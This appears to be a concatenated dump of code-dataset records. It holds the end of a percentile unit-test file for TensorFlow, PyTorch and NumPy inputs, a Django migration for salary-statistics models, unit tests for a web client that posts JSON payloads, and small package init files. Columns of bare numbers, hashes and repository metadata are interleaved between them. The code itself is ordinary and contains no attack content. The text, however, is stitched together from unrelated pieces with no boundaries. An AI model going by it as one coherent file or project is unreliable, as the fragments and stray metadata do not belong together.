obj1 = fe.backend.percentile(t, percentiles=[0, 50]) obj2 = tf.constant([[[1]], [[5]]]) self.assertTrue(is_equal(obj1, obj2)) def test_percentile_tf_input_axis_not_none(self): with self.subTest("two_dimensional"): t = tf.constant([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(t, percentiles=50, axis=0) obj2 = tf.constant([[2, 4, 6]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("single_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=1) obj2 = tf.constant([[3], [5], [6]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=[0, 1]) obj2 = tf.constant([[5]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(t, percentiles=[0, 50], axis=[0, 1]) obj2 = tf.constant([[[1]], [[5]]]) self.assertTrue(is_equal(obj1, obj2)) def test_percentile_tf_input_axis_not_none_keepdims_false(self): with self.subTest("two_dimensional"): t = tf.constant([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(t, percentiles=50, axis=0, keepdims=False) obj2 = tf.constant([2, 4, 6]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("single_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=1, keepdims=False) obj2 = tf.constant([3, 5, 6]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=[0, 1], keepdims=False) obj2 = tf.constant(5) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(t, percentiles=[0, 50], axis=[0, 1], keepdims=False) obj2 = tf.constant([1, 5]) self.assertTrue(is_equal(obj1, obj2)) # ------------------------- torch input -------------------------------------- def test_percentile_torch_input_axis_none(self): with self.subTest("even_elements"): t = torch.tensor([1, 2]) obj1 = fe.backend.percentile(t, percentiles=50) obj2 = torch.tensor([1]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("two_dimensional"): t = torch.tensor([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(t, percentiles=50) obj2 = torch.tensor([[5]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(t, percentiles=[0, 50]) obj2 = torch.tensor([[[1]], [[5]]]) self.assertTrue(is_equal(obj1, obj2)) def test_percentile_torch_input_axis_not_none(self): with self.subTest("two_dimensional"): t = torch.tensor([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(t, percentiles=50, axis=0) obj2 = torch.tensor([[2, 4, 6]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("single_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=1) obj2 = torch.tensor([[3], [5], [6]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=[0, 1]) obj2 = torch.tensor([[5]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(t, percentiles=[0, 50], axis=[0, 1]) obj2 = torch.tensor([[[1]], [[5]]]) self.assertTrue(is_equal(obj1, obj2)) def test_percentile_torch_input_axis_not_none_keepdims_false(self): with self.subTest("two_dimensional"): t = torch.tensor([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(t, percentiles=50, axis=0, keepdims=False) obj2 = torch.tensor([2, 4, 6]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("single_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=1, keepdims=False) obj2 = torch.tensor([3, 5, 6]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_axis"): obj1 = fe.backend.percentile(t, percentiles=50, axis=[0, 1], keepdims=False) obj2 = torch.tensor(5) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(t, percentiles=[0, 50], axis=[0, 1], keepdims=False) obj2 = torch.tensor([1, 5]) self.assertTrue(is_equal(obj1, obj2)) # ------------------------- numpy input --------------------------------------- def test_percentile_np_input_axis_none(self): with self.subTest("even_elements"): n = np.array([1, 2]) obj1 = fe.backend.percentile(n, percentiles=50) obj2 = np.array([1]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("two_dimensional"): n = np.array([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(n, percentiles=50) obj2 = np.array([[5]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(n, percentiles=[0, 50]) obj2 = np.array([[[1]], [[5]]]) self.assertTrue(is_equal(obj1, obj2)) def test_percentile_np_input_axis_not_none(self): with self.subTest("two_dimensional"): n = np.array([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(n, percentiles=50, axis=0) obj2 = np.array([[2, 4, 6]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("single_axis"): obj1 = fe.backend.percentile(n, percentiles=50, axis=1) obj2 = np.array([[3], [5], [6]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_axis"): obj1 = fe.backend.percentile(n, percentiles=50, axis=[0, 1]) obj2 = np.array([[5]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(n, percentiles=[0, 50], axis=[0, 1]) obj2 = np.array([[[1]], [[5]]]) self.assertTrue(is_equal(obj1, obj2)) def test_percentile_np_input_axis_not_none_keepdims_false(self): with self.subTest("two_dimensional"): n = np.array([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(n, percentiles=50, axis=0, keepdims=False) obj2 = np.array([2, 4, 6]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("single_axis"): obj1 = fe.backend.percentile(n, percentiles=50, axis=1, keepdims=False) obj2 = np.array([3, 5, 6]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_axis"): obj1 = fe.backend.percentile(n, percentiles=50, axis=[0, 1], keepdims=False) self.assertTrue(is_equal(obj1, 5, assert_type=False)) with self.subTest("multi_percentile"): obj1 = fe.backend.percentile(n, percentiles=[0, 50], axis=[0, 1], keepdims=False) obj2 = np.array([1, 5]) self.assertTrue(is_equal(obj1, obj2))
43.386792
93
0.572624
1,184
9,198
4.342061
0.098818
0.046295
0.096285
0.147637
0.864229
0.859366
0.847306
0.83972
0.83972
0.828633
0
0.05897
0.258861
9,198
211
94
43.592417
0.695174
0.088932
0
0.691824
0
0
0.053091
0
0
0
0
0
0.207547
1
0.056604
false
0
0.037736
0
0.100629
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8c9623d3b8dea0025c00a613d033728763b54e78
5,927
py
Python
tx_salaries/migrations/0001_initial.py
texastribune/tx_salaries
197d8da4e1783216830b8d0a5adb23c0200fd3e8
[ "Apache-2.0" ]
6
2016-05-18T05:53:44.000Z
2019-06-13T18:27:50.000Z
tx_salaries/migrations/0001_initial.py
texastribune/tx_salaries
197d8da4e1783216830b8d0a5adb23c0200fd3e8
[ "Apache-2.0" ]
64
2015-02-13T18:29:04.000Z
2018-06-15T19:48:56.000Z
tx_salaries/migrations/0001_initial.py
texastribune/tx_salaries
197d8da4e1783216830b8d0a5adb23c0200fd3e8
[ "Apache-2.0" ]
2
2015-05-08T19:22:12.000Z
2016-07-11T16:57:49.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.9.4 on 2016-03-27 17:50 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion import tx_people.fields import tx_people.utils class Migration(migrations.Migration): initial = True dependencies = [ ('tx_people', '0001_initial'), ] operations = [ migrations.CreateModel( name='CompensationType', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(choices=[(b'FT', b'Full Time'), (b'PT', b'Part Time')], max_length=250)), ('description', models.TextField()), ], ), migrations.CreateModel( name='Employee', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('start_date', tx_people.fields.ReducedDateField(max_length=10, validators=[tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator()])), ('end_date', tx_people.fields.ReducedDateField(max_length=10, validators=[tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator()])), ('created_at', models.DateTimeField(auto_now=True)), ('updated_at', models.DateTimeField(auto_now_add=True)), ('hire_date', tx_people.fields.ReducedDateField(max_length=10, validators=[tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator(), tx_people.utils.ReducedDateValidator()])), ('tenure', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('slug', models.SlugField(blank=True, default=None, max_length=255, null=True)), ('compensation', models.DecimalField(db_index=True, decimal_places=4, max_digits=12)), ('updated', models.DateTimeField(auto_now=True)), ('compensation_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tx_salaries.CompensationType')), ('position', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tx_people.Membership')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='EmployeeTitle', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=250)), ], ), migrations.CreateModel( name='OrganizationStats', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('distribution', models.TextField(null=True)), ('highest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('median_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('lowest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('total_number', models.PositiveIntegerField(default=0)), ('races', models.TextField()), ('female', models.TextField()), ('male', models.TextField()), ('time_employed', models.TextField()), ('date_provided', models.DateField(blank=True, null=True)), ('slug', models.SlugField(blank=True, default=None, max_length=255, null=True)), ('organization', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='stats', to='tx_people.Organization')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='PositionStats', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('distribution', models.TextField(null=True)), ('highest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('median_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('lowest_paid', models.DecimalField(blank=True, decimal_places=4, max_digits=12, null=True)), ('total_number', models.PositiveIntegerField(default=0)), ('races', models.TextField()), ('female', models.TextField()), ('male', models.TextField()), ('time_employed', models.TextField()), ('date_provided', models.DateField(blank=True, null=True)), ('slug', models.SlugField(blank=True, default=None, max_length=255, null=True)), ('position', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='stats', to='tx_people.Post')), ], options={ 'abstract': False, }, ), migrations.AddField( model_name='employee', name='title', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='employees', to='tx_salaries.EmployeeTitle'), ), ]
57.543689
374
0.619875
598
5,927
5.968227
0.212375
0.05828
0.065565
0.157187
0.777529
0.752312
0.727094
0.718969
0.718969
0.70552
0
0.01482
0.23722
5,927
102
375
58.107843
0.774607
0.011304
0
0.585106
1
0
0.109442
0.012805
0
0
0
0
0
1
0
false
0
0.053191
0
0.095745
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8ca01cfed4288f45f44ef238b661f79c2555aa94
7,565
py
Python
hardware/tests/test_web_client.py
ab7289/mercury-hardware
dc2a4e888184a32aaa1355a1fe9ec77a9cb15ebe
[ "MIT" ]
1
2020-05-09T21:37:12.000Z
2020-05-09T21:37:12.000Z
hardware/tests/test_web_client.py
ab7289/mercury-hardware
dc2a4e888184a32aaa1355a1fe9ec77a9cb15ebe
[ "MIT" ]
8
2020-05-07T01:54:14.000Z
2020-05-13T21:31:56.000Z
hardware/tests/test_web_client.py
ab7289/mercury-hardware
dc2a4e888184a32aaa1355a1fe9ec77a9cb15ebe
[ "MIT" ]
2
2020-05-06T22:24:20.000Z
2020-05-13T20:32:29.000Z
import unittest from unittest.mock import patch, MagicMock from testfixtures import TempDirectory, LogCapture from requests.exceptions import HTTPError import os import json from hardware.CommunicationsPi.web_client import WebClient from hardware.Utils.logger import Logger class WebClientTests(unittest.TestCase): def setUp(self): self.temp_dir = TempDirectory() def tearDown(self): self.temp_dir.cleanup() def test_init_no_log_no_server(self): with patch.dict( os.environ, { "WEB_CLIENT_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): l_client = WebClient() self.assertTrue(l_client.logging is not None) self.assertTrue(l_client.logging.name == "WEB_CLIENT_LOG_FILE") self.assertIsInstance(l_client.logging, Logger) self.assertEqual(l_client.url, "https://0.0.0.0:0") def test_init_no_log_no_server_http(self): with patch.dict( os.environ, { "WEB_CLIENT_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): l_client = WebClient() self.assertTrue(l_client.logging is not None) self.assertTrue(l_client.logging.name == "WEB_CLIENT_LOG_FILE") self.assertIsInstance(l_client.logging, Logger) self.assertEqual(l_client.url, "http://0.0.0.0:0") def test_init_no_log_server(self): with patch.dict( os.environ, { "WEB_CLIENT_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): l_client = WebClient(server_url="/url") self.assertTrue(l_client.logging is not None) self.assertTrue(l_client.logging.name == "WEB_CLIENT_LOG_FILE") self.assertIsInstance(l_client.logging, Logger) self.assertEqual(l_client.url, "/url") def test_init_log_no_server(self): with patch.dict( os.environ, { "NEW_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): l_client = WebClient(log_file_name="NEW_LOG_FILE") self.assertTrue(l_client.logging is not None) self.assertTrue(l_client.logging.name == "NEW_LOG_FILE") self.assertIsInstance(l_client.logging, Logger) self.assertEqual(l_client.url, "https://0.0.0.0:0") def test_init_log_server(self): with patch.dict( os.environ, { "NEW_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): l_client = WebClient(log_file_name="NEW_LOG_FILE", server_url="/url") self.assertTrue(l_client.logging is not None) self.assertTrue(l_client.logging.name == "NEW_LOG_FILE") self.assertIsInstance(l_client.logging, Logger) self.assertEqual(l_client.url, "/url") @patch("hardware.CommunicationsPi.web_client.requests") def test_send_payload(self, mock_requests=MagicMock()): with patch.dict( os.environ, { "WEB_CLIENT_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): with LogCapture() as capture: l_client = WebClient() payload = '{"key": "value" }' payload = json.loads(payload) l_client.send(payload) mock_requests.post.assert_called_with("https://0.0.0.0:0", json=payload) capture.check( ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"), ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payload }"), ) @patch("hardware.CommunicationsPi.web_client.requests") def test_ping_server_raise_http_ex(self, mock_requests=MagicMock()): with patch.dict( os.environ, { "WEB_CLIENT_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): with LogCapture() as capture: l_client = WebClient() mock_requests.post.side_effect = HTTPError("HTTPError") payload = '{"key": "value" }' payloadJson = json.loads(payload) with self.assertRaises(HTTPError): l_client.send(payloadJson) mock_requests.post.assert_called_with( "https://0.0.0.0:0", json=payloadJson ) with self.assertRaises(HTTPError): l_client.send(payload, is_json=False) mock_requests.post.assert_called_with("https://0.0.0.0:0", data=payload) capture.check( ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"), ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payloadJson }"), ("WEB_CLIENT_LOG_FILE", "ERROR", "HTTP error occurred: HTTPError"), ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"), ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payload }"), ("WEB_CLIENT_LOG_FILE", "ERROR", "HTTP error occurred: HTTPError"), ) @patch("hardware.CommunicationsPi.web_client.requests") def test_ping_server_raise_ex(self, mock_requests=MagicMock()): with patch.dict( os.environ, { "WEB_CLIENT_LOG_FILE": "web_client.log", "LOG_DIRECTORY": self.temp_dir.path, "LAN_SERVER_HTTPS": "True", "LAN_SERVER_IP": "0.0.0.0", "LAN_PORT": "0", }, ): with LogCapture() as capture: l_client = WebClient() mock_requests.post.side_effect = Exception("Exception") payload = '{"key": "value" }' payload = json.loads(payload) with self.assertRaises(Exception): l_client.send(payload) mock_requests.post.assert_called_with("https://0.0.0.0:0", json=payload) capture.check( ("WEB_CLIENT_LOG_FILE", "INFO", "Pinging: https://0.0.0.0:0"), ("WEB_CLIENT_LOG_FILE", "INFO", f"data: { payload }"), ("WEB_CLIENT_LOG_FILE", "ERROR", "error occurred: Exception"), ) if __name__ == "__main__": unittest.main()
35.683962
88
0.531395
843
7,565
4.485172
0.104389
0.035969
0.038879
0.031738
0.855858
0.855858
0.846337
0.799524
0.784713
0.762761
0
0.019126
0.343424
7,565
211
89
35.853081
0.742098
0
0
0.666667
0
0
0.223926
0.017845
0
0
0
0
0.155172
1
0.057471
false
0
0.045977
0
0.109195
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8cc9427d412c06455c1c0bc051a8ebab29b718c8
67
py
Python
nam/utils/__init__.py
BullAJ/nam
fc2da75ba008c4ef02a83747f2116036fa6fec46
[ "MIT" ]
15
2021-03-26T16:00:44.000Z
2022-03-26T07:43:10.000Z
src/baseline/nam/utils/__init__.py
fau-is/gam_comparison
c47e8f8ced281e0a71b7959a211cb5b289ac7606
[ "MIT" ]
6
2021-01-03T22:55:54.000Z
2022-03-11T02:50:38.000Z
src/baseline/nam/utils/__init__.py
fau-is/gam_comparison
c47e8f8ced281e0a71b7959a211cb5b289ac7606
[ "MIT" ]
9
2021-02-08T18:45:52.000Z
2022-03-18T19:42:57.000Z
from .args import * from .graphing import * from .loggers import *
16.75
23
0.731343
9
67
5.444444
0.555556
0.408163
0
0
0
0
0
0
0
0
0
0
0.179104
67
3
24
22.333333
0.890909
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8ceb51a421e2743872ec8672d9eaadd746136453
122
py
Python
examples/convert.py
AlexDLSy/canmatrix
6a03adc29e0734f06950ea9021b488b89deafcb7
[ "BSD-2-Clause" ]
656
2015-02-14T17:56:33.000Z
2022-03-31T17:03:02.000Z
examples/convert.py
AlexDLSy/canmatrix
6a03adc29e0734f06950ea9021b488b89deafcb7
[ "BSD-2-Clause" ]
512
2015-11-05T15:57:12.000Z
2022-03-31T19:27:51.000Z
examples/convert.py
AlexDLSy/canmatrix
6a03adc29e0734f06950ea9021b488b89deafcb7
[ "BSD-2-Clause" ]
348
2015-05-25T03:42:00.000Z
2022-03-24T19:41:30.000Z
#!/usr/bin/env python3 import sys sys.path.append('..') import canmatrix.cli.convert canmatrix.cli.convert.cli_convert()
17.428571
35
0.762295
18
122
5.111111
0.611111
0.326087
0.413043
0
0
0
0
0
0
0
0
0.00885
0.07377
122
6
36
20.333333
0.80531
0.172131
0
0
0
0
0.02
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
5090ecc52653a879e1e20c3598cb5030d2ce3e72
93
py
Python
vit/formatter/scheduled_formatted.py
kinifwyne/vit
e2cbafce922b1e09c4a66e7dc9592c51fe628e9d
[ "MIT" ]
179
2020-07-28T08:21:51.000Z
2022-03-30T21:39:37.000Z
vit/formatter/scheduled_formatted.py
kinifwyne/vit
e2cbafce922b1e09c4a66e7dc9592c51fe628e9d
[ "MIT" ]
255
2017-02-01T11:49:12.000Z
2020-07-26T22:31:25.000Z
vit/formatter/scheduled_formatted.py
kinifwyne/vit
e2cbafce922b1e09c4a66e7dc9592c51fe628e9d
[ "MIT" ]
26
2017-01-17T20:31:13.000Z
2020-06-17T13:09:01.000Z
from vit.formatter.scheduled import Scheduled class ScheduledFormatted(Scheduled): pass
18.6
45
0.817204
10
93
7.6
0.8
0
0
0
0
0
0
0
0
0
0
0
0.129032
93
4
46
23.25
0.938272
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.333333
0.333333
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
50b404a20b6b5247319234cb273258d88d096814
214
py
Python
flexmeasures/data/models/planning/exceptions.py
FlexMeasures/flexmeasures
a4367976d37ac5721b8eb3ce8a2414595e52c678
[ "Apache-2.0" ]
12
2021-12-18T10:41:10.000Z
2022-03-29T23:00:29.000Z
flexmeasures/data/models/planning/exceptions.py
FlexMeasures/flexmeasures
a4367976d37ac5721b8eb3ce8a2414595e52c678
[ "Apache-2.0" ]
103
2021-12-07T08:51:15.000Z
2022-03-31T13:28:48.000Z
flexmeasures/data/models/planning/exceptions.py
FlexMeasures/flexmeasures
a4367976d37ac5721b8eb3ce8a2414595e52c678
[ "Apache-2.0" ]
3
2022-01-18T04:45:48.000Z
2022-03-14T09:48:22.000Z
class MissingAttributeException(Exception): pass class UnknownMarketException(Exception): pass class UnknownPricesException(Exception): pass class WrongTypeAttributeException(Exception): pass
14.266667
45
0.785047
16
214
10.5
0.4375
0.309524
0.321429
0
0
0
0
0
0
0
0
0
0.158879
214
14
46
15.285714
0.933333
0
0
0.5
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
0
1
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
50e07f9cb689cc6c6184e548267a3670d6b5bca6
1,042
py
Python
challenges/ll-zip/ll-zip/tests/test_ll_zip.py
ebrahimayyad11/data-structures-and-algorithms
c85b0de90f887478456faf1fafae78bd80fbfd2e
[ "MIT" ]
null
null
null
challenges/ll-zip/ll-zip/tests/test_ll_zip.py
ebrahimayyad11/data-structures-and-algorithms
c85b0de90f887478456faf1fafae78bd80fbfd2e
[ "MIT" ]
5
2021-06-13T19:42:42.000Z
2021-07-12T18:00:54.000Z
challenges/ll-zip/ll-zip/tests/test_ll_zip.py
ebrahimayyad11/data-structures-and-algorithms
c85b0de90f887478456faf1fafae78bd80fbfd2e
[ "MIT" ]
null
null
null
from ll_zip.linked_list import LinkedList from ll_zip import __version__ from ll_zip.ll_zip import ll_zip def test_version(): assert __version__ == '0.1.0' def test_ll_zip_1(): ll1 = LinkedList() ll2 = LinkedList() ll1.append(1) ll1.append(3) ll1.append(2) ll2.append(5) ll2.append(9) ll2.append(4) excepted = 'Head -> (1) -> (5) -> (3) -> (9) -> (2) -> (4) -> Null' actual = ll_zip(ll1,ll2) assert actual == excepted def test_ll_zip_2(): ll1 = LinkedList() ll2 = LinkedList() ll1.append(1) ll1.append(3) ll2.append(5) ll2.append(9) ll2.append(4) excepted = 'Head -> (1) -> (5) -> (3) -> (9) -> (4) -> Null' actual = ll_zip(ll1,ll2) assert actual == excepted def test_ll_zip(): ll1 = LinkedList() ll2 = LinkedList() ll1.append(1) ll1.append(3) ll1.append(2) ll2.append(5) ll2.append(9) excepted = 'Head -> (1) -> (5) -> (3) -> (9) -> (2) -> Null' actual = ll_zip(ll1,ll2) assert actual == excepted
18.607143
71
0.565259
151
1,042
3.728477
0.165563
0.097691
0.056838
0.063943
0.776199
0.776199
0.776199
0.744227
0.744227
0.671403
0
0.084197
0.259117
1,042
56
72
18.607143
0.645078
0
0
0.717949
0
0.076923
0.146692
0
0
0
0
0
0.102564
1
0.102564
false
0
0.076923
0
0.179487
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
0fdef1d6e164092e4f858cfa96e7c7ec0d5dad2a
59
py
Python
LT/models/__init__.py
Dong-JinKim/Parametric-Contrastive-Learning
62bcfa691db29d3a7a0b0760e870cd62eb7b66fb
[ "MIT" ]
85
2021-08-04T14:27:56.000Z
2022-03-30T13:35:36.000Z
LT/models/__init__.py
Dong-JinKim/Parametric-Contrastive-Learning
62bcfa691db29d3a7a0b0760e870cd62eb7b66fb
[ "MIT" ]
12
2021-08-23T15:57:06.000Z
2022-03-30T03:31:54.000Z
LT/models/__init__.py
Dong-JinKim/Parametric-Contrastive-Learning
62bcfa691db29d3a7a0b0760e870cd62eb7b66fb
[ "MIT" ]
9
2021-08-10T03:04:15.000Z
2022-01-09T14:00:05.000Z
from .resnet_cifar import * from .resnet_imagenet import *
19.666667
30
0.79661
8
59
5.625
0.625
0.444444
0
0
0
0
0
0
0
0
0
0
0.135593
59
2
31
29.5
0.882353
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
0fe3014bc35ef9c6f5a5dbe5d0aa4e251d15bc15
19
py
Python
utils/__init__.py
SionHu/LP-MOT
90e6a1d51ebe1a948ac5c018a5ee560654e824f1
[ "MIT" ]
null
null
null
utils/__init__.py
SionHu/LP-MOT
90e6a1d51ebe1a948ac5c018a5ee560654e824f1
[ "MIT" ]
null
null
null
utils/__init__.py
SionHu/LP-MOT
90e6a1d51ebe1a948ac5c018a5ee560654e824f1
[ "MIT" ]
null
null
null
from .OF import *
9.5
18
0.631579
3
19
4
1
0
0
0
0
0
0
0
0
0
0
0
0.263158
19
1
19
19
0.857143
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
ba1f8bf45ccceae165160db8a4d23a7598b706ff
162
py
Python
notebooks/add_to_syspath.py
nicogab34/AudioMNIST
39d8bf5eb2bf5d8a32d21d3d5549935cb4a62931
[ "MIT" ]
null
null
null
notebooks/add_to_syspath.py
nicogab34/AudioMNIST
39d8bf5eb2bf5d8a32d21d3d5549935cb4a62931
[ "MIT" ]
null
null
null
notebooks/add_to_syspath.py
nicogab34/AudioMNIST
39d8bf5eb2bf5d8a32d21d3d5549935cb4a62931
[ "MIT" ]
1
2019-09-17T15:26:35.000Z
2019-09-17T15:26:35.000Z
#Making root folder available to notebook import os import sys if os.path.split(os.getcwd())[0] not in sys.path : sys.path.append(os.path.split(os.getcwd())[0])
32.4
97
0.734568
30
162
3.966667
0.566667
0.10084
0.184874
0.218487
0.336134
0.336134
0
0
0
0
0
0.013889
0.111111
162
5
97
32.4
0.8125
0.246914
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.666667
0
0.666667
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
e84b30c4073b9c869d9bfef77ad08dffec3ffe4c
44
py
Python
wikisync/__init__.py
ivanchoo/TracWikiSync
529f226b351efe49983191723e4e04ffd0ab325a
[ "MIT" ]
1
2016-10-07T11:33:20.000Z
2016-10-07T11:33:20.000Z
wikisync/__init__.py
InQuant/TracWikiSync
60d95c59176829b2c9a6d29e27364823b08b5e0d
[ "MIT" ]
3
2015-02-23T04:09:41.000Z
2018-07-30T06:00:00.000Z
wikisync/__init__.py
InQuant/TracWikiSync
60d95c59176829b2c9a6d29e27364823b08b5e0d
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from plugin import *
22
23
0.590909
6
44
4.333333
1
0
0
0
0
0
0
0
0
0
0
0.027778
0.181818
44
2
24
22
0.694444
0.477273
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
